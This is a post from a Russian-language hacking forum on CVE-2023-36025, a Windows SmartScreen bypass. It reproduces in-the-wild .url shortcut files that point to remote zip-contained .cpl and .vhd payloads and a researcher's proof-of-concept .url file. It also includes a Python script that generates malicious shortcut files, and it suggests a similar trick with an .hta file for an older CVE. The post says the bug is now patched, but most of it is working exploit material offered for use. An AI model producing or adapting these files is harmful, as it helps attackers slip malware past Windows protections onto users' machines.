• XSS.stack #1 – первый литературный журнал от юзеров форума

Local Security Feature Bypass, Windows SmartScreen, CVE-2023-36025

weaver

31 c0 bb ea 1b e6 77 66 b8 88 13 50 ff d3
Забанен
Регистрация
19.12.2018
Сообщения
3 301
Решения
11
Реакции
4 622
Депозит
0.0001
Пожалуйста, обратите внимание, что пользователь заблокирован

Похожая cve-2016-3353 можно точно так же использовать exp.url -> archive.zip\test.hta



PoCs in the wild


sample1.url
Код:
[InternetShortcut]
IconIndex=38
HotKey=0
IDList=
URL=file://xxxxxxxx\scarica\config.zip\config.cpl
IconFile=C:\Windows\system32\SHELL32.dll
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9

sample2.url
Код:
[InternetShortcut]
IconIndex=38
HotKey=0
IDList=
URL=file://xxxxxxxxx/scarica/gruppo.zip/gruppo.vhd
IconFile=C:\Windows\system32\SHELL32.dll
[{000214A0-0000-0000-C000-000000000046}]
Prop3=19,9


PoC - опубликованный исследователем

test.url
Код:
[InternetShortcut]
URL=malicious-website.com
IDList=
IconFile=\\\\\\\\192.168.1.100\\\\share\\\\icon.ico
IconIndex=1


script.py
Python:
def create_malicious_url_file(filename, target_url, icon_path):
    with open(filename, 'w') as file:
        file.write('[InternetShortcut]\\\\n')
        file.write(f'URL={target_url}\\\\n')
        file.write('IDList=\\\\n')
        file.write(f'IconFile={icon_path}\\\\n')
        file.write('IconIndex=1\\\\n')

malicious_url = "<http://malicious-website.com>"
icon_network_path = "\\\\\\\\\\\\\\\\192.168.1.100\\\\\\\\share\\\\\\\\icon.ico"
create_malicious_url_file("malicious_link.url", malicious_url, icon_network_path)


p.s. багу закрыли поэтому теперь выдаёт алерт
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх